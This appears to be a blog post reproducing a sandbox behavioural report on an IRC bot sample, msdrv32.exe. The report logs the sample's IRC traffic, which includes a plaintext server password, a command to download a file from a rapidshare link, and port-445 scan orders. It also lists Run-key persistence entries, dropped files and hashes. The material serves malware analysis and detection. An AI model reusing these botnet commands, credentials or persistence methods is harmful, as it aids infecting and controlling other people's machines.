Server : s3.com [Crew]

Remote Host Port Number
69.42.218.72 1863

MODE [00_USA_XP_3307080] -ix
JOIN #dam open
PRIVMSG #t :HTTP SET http://rapidshare.com/files/339293902/newb
PRIVMSG #dam :scan// Trying to get external IP.
PRIVMSG #dam :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 35 threads.
PRIVMSG #dam :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 3 seconds for 0 minutes using 15 threads.
NICK [00_USA_XP_3307080]
USER SP2-363 * 0 :COMPUTERNAME

* There was an outbound traffic produced on port 1863:PASS letmein

Other details

* The following ports were open in the system:

Port Protocol Process
1055 TCP msdrv32.exe (%Windir%msdrv32.exe)
1056 TCP msdrv32.exe (%Windir%msdrv32.exe)
1349 TCP msdrv32.exe (%Windir%msdrv32.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Driver Setup = “%Windir%msdrv32.exe”

so that msdrv32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Microsoft Driver Setup = “%Windir%msdrv32.exe”

so that msdrv32.exe runs every time Windows starts

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
msdrv32.exe %Windir%msdrv32.exe 339 968 bytes

File System Modifications

* The following files were created in the system:

# Filename(s) File Size File Hash
1 %Windir%logfile32.txt 0 bytes MD5: 0xD41D8CD98F00B204E9800998ECF8427E
SHA-1: 0xDA39A3EE5E6B4B0D3255BFEF95601890AFD80709
2 %Windir%msdrv32.exe
[file and pathname of the sample #1] 50 688 bytes MD5: 0xB276061AB725FA6B264A0DADC86CBE6B
SHA-1: 0x20AF7611A328B4323DE6988EC757761EEF8054E3

Categories: Uncategorized
Previous post